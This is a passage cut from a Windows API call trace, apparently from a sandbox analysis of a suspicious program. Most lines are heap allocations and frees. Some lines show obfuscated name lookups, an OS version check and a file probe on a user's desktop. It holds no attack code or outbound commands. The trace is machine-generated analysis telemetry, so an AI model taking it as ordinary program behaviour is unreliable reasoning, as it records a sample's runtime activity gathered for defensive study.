Flags=0x0, Size=0x8) returned 0x2a730c8 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0105.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0105.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0105.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0105.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0105.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0105.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0105.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0105.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0105.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0105.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0105.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0105.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0105.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0105.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0105.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0105.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.325] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0105.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0105.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0105.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0105.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0105.325] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0105.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0105.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0105.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0105.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0105.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0105.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0105.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0105.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0105.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0105.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0105.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0105.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0105.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0105.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0105.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0105.326] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0105.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0105.326] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/TtFu8ac2GuQ.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 0x9a3b80 [0105.326] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0105.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0105.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0105.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0105.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0105.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0105.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0105.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0105.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.327] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0105.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0105.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.327] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0105.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0105.328] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.328] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0105.328] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.328] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0105.328] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.328] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0105.328] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0105.328] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0105.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0105.329] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0105.329] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.329] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0105.329] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0105.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0105.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0105.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0105.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0105.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0105.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0105.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0105.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0105.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.330] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.330] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.331] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0105.331] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0105.331] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0105.331] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0105.331] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0105.331] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0105.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0105.331] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.332] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.332] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.332] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0105.332] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0105.332] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.332] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.332] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0105.332] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.332] PeekMessageW (in: lpMsg=0x8cf048, 